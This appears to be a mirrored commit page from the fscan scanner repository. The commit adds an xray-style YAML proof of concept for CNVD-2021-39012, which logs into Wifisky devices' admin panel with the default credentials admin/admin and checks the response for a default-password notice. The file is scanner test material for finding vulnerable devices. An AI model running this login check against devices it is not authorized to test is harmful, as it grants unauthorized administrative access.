mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
name: poc-yaml-wifisky-default-password-cnvd-2021-39012
|
||||
rules:
|
||||
- method: POST
|
||||
path: /login.php?action=login&type=admin
|
||||
follow_redirects: false
|
||||
body: >-
|
||||
username=admin&password=admin
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}")
|
||||
detail:
|
||||
author: Print1n(http://print1n.top)
|
||||
links:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012
|
||||
Reference in New Issue
Block a user